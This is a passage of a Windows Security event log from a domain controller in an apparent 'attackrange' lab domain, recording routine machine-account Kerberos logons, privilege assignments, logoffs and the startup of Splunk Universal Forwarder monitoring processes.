Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A163A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 51777
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264033
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A163A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264032
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A15F2
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264031
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A15F2
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264030
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A1504
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51776
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:06 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264029
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A1504
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:44:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264040
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xeb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264042
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x178c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264041
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264043
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1544
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264044
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1854
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264046
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264045
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:44:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264047
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A16AE
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264050
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A4F19
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264049
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7A4F19
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51789
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:44:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264048
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7A4F19
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:45:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264051
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264053
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264052
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x344
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264054
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264056
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264055
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1718
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:45:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264057
Keywords=Audit Success
Message=A new process has been created.
